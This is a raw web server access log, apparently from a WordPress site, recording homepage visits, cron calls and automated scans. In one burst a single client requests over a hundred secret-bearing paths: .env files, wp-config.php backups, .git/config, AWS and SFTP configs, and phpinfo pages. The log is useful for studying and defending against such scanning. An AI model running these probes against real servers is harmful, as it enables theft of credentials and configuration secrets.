180.153.236.42 - - [05/Oct/2025:21:23:08 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [05/Oct/2025:21:23:11 +0800] "POST /wp-cron.php?doing_wp_cron=1759670591.1383609771728515625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
180.153.236.242 - - [05/Oct/2025:21:23:11 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [05/Oct/2025:21:29:23 +0800] "POST /wp-cron.php?doing_wp_cron=1759670963.8233969211578369140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [05/Oct/2025:21:29:24 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.142.195.99 - - [05/Oct/2025:21:29:44 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:21:31:50 +0800] "POST /wp-cron.php?doing_wp_cron=1759671110.4365329742431640625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [05/Oct/2025:21:31:50 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.191.70 - - [05/Oct/2025:21:31:51 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.191.6 - - [05/Oct/2025:21:32:33 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:21:37:52 +0800] "POST /wp-cron.php?doing_wp_cron=1759671472.3486599922180175781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [05/Oct/2025:21:37:52 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.211.188.185 - - [05/Oct/2025:21:42:21 +0800] "GET / HTTP/1.1" 200 39369 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /dashboard/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /temp.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /_profiler/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /infophp.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/queue.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /pinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /time.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /phpinfos.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /info.php HTTP/1.1" 200 49 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /i.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /php-info.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /phpversion.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /asdf.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /php.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /test.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/app_local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/autoload/local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /application/config/doctypes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/session.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /application/config/profiler.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/production.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /application/config/routes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /app/etc/config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /application/config/mimes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET / HTTP/1.1" 200 39369 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /application/config/migration.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/services.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/requirements.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/database.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /application/config/foreign_chars.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /install/index.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /application/config/hooks.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/auth.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/app.default.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /config/database.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:42 +0800] "GET /application/config/autoload.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:43 +0800] "GET /config/app.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /.vscode/sftp.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /config/paths.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /phpinfo.php4 HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /secured/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /index.php/phpinfo HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /api/.env HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /wp-config.php HTTP/1.1" 200 31 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /aws.yml HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /old_phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /api/config/tsconfig.json HTTP/1.1" 200 81 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /_profiler/phpinfo HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /config/cache.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /config/module.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /config/aws.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /config/broadcasting.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /config/config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /.git/config HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /appsettings.Test.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /phpinfo.php5 HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:44 +0800] "GET /application/config/database.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /.vscode/settings.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /phpinfo HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /config/view.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /.gitlab-ci/.env HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /.local HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /login/index.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /.docker/laravel/app/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /application/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
36.133.115.36 - - [05/Oct/2025:21:42:45 +0800] "POST /wp-cron.php?doing_wp_cron=1759671764.1185529232025146484375 HTTP/1.1" 499 0 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /prevlaravel/sftp-config.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /public/client/planinfo HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /wp-config.php.old HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /apps/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /config/local.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /application/config/constants.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /phpinfo.php3 HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /mailer/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /.env.config HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /launchSettings.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /config/test.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /app/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /admin-app/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /.production HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /config/aws.yml HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /src/settings.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /app/etc/config.local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /config/config.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:45 +0800] "GET /.env.backup HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:46 +0800] "GET /wp-config.php.bak HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:46 +0800] "GET /config/production.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /.wp-config.php.swp HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /appsettings.Production.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /tsconfig.app.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /appsettings.QA.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /settings.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /laravel/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /manifest.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /appsettings.Development.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /tsconfig.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /live_env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /config/development.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:47 +0800] "GET /web/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /config/staging.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /.env.bak HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /config/daemon.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /sftp-config.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /config/dev.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /public/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /tsconfig.spec.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /.env-example HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /appsettings.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /angular.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /bundleconfig.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /prod/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /laravel/core/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /.vscode/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /config.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /conf/application.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /appsettings.Staging.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /hosting.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /appsettings.Local.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /meteor.settings.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /local/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /Properties/launchSettings.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /config/prod.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /beta/.env HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /config/settings.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /config/test.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /.docker/config.json HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [05/Oct/2025:21:42:48 +0800] "GET /?phpinfo=1 HTTP/1.1" 200 33467 "-" "Go-http-client/1.1"
36.133.115.36 - - [05/Oct/2025:21:49:09 +0800] "POST /wp-cron.php?doing_wp_cron=1759672149.9203319549560546875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/G_CCTV-1-MD/G_CCTV-1-MD.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/G_CCTV-1-CQ/G_CCTV-1-CQ.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/G_CCTV-1-HD/G_CCTV-1-HD.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/G_CCTV-1-HQ-265-5M/G_CCTV-1-HQ-265-5M.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/G_CCTV-1-HQ/G_CCTV-1-HQ.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/CCTV1/CCTV1.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/CCTV-1-HD/CCTV-1-HD.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/CCTV-1/CCTV-1.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/G_CCTV-1-HQ-265-8M/G_CCTV-1-HQ-265-8M.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/CCTV-1-HQ/CCTV-1-HQ.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/G_CCTV-1-AVS-4K264/G_CCTV-1-AVS-4K264.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/G_CCTV-1-HD-265-5M/G_CCTV-1-HD-265-5M.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/G_CCTV-1/G_CCTV-1.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
39.191.209.32 - - [05/Oct/2025:21:49:10 +0800] "GET /gitv_live/G_CCTV-1-HD-265-8M/G_CCTV-1-HD-265-8M.m3u8 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
36.133.115.36 - - [05/Oct/2025:21:56:43 +0800] "POST /wp-cron.php?doing_wp_cron=1759672603.3189840316772460937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.178.110.109 - - [05/Oct/2025:21:56:43 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
91.230.168.98 - - [05/Oct/2025:22:06:50 +0800] "GET / HTTP/1.1" 200 165874 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
36.133.115.36 - - [05/Oct/2025:22:09:41 +0800] "POST /wp-cron.php?doing_wp_cron=1759673381.5207500457763671875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
129.226.93.214 - - [05/Oct/2025:22:09:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
129.226.93.214 - - [05/Oct/2025:22:09:43 +0800] "GET / HTTP/1.1" 200 33468 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
87.120.191.93 - - [05/Oct/2025:22:09:43 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:22:13:36 +0800] "POST /wp-cron.php?doing_wp_cron=1759673616.4869139194488525390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [05/Oct/2025:22:13:36 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:22:17:42 +0800] "POST /wp-cron.php?doing_wp_cron=1759673861.9872078895568847656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [05/Oct/2025:22:17:42 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:22:25:18 +0800] "POST /wp-cron.php?doing_wp_cron=1759674318.5736720561981201171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [05/Oct/2025:22:25:18 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:22:34:42 +0800] "POST /wp-cron.php?doing_wp_cron=1759674882.4735391139984130859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
31.220.43.83 - - [05/Oct/2025:22:34:42 +0800] "GET /cgi-bin/test-cgi HTTP/1.1" 404 31381 "-" "Python-urllib/3.10"
36.133.115.36 - - [05/Oct/2025:22:44:41 +0800] "POST /wp-cron.php?doing_wp_cron=1759675480.9634070396423339843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [05/Oct/2025:22:44:41 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:22:54:23 +0800] "POST /wp-cron.php?doing_wp_cron=1759676063.3263568878173828125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [05/Oct/2025:22:54:23 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:23:00:26 +0800] "POST /wp-cron.php?doing_wp_cron=1759676426.4806730747222900390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
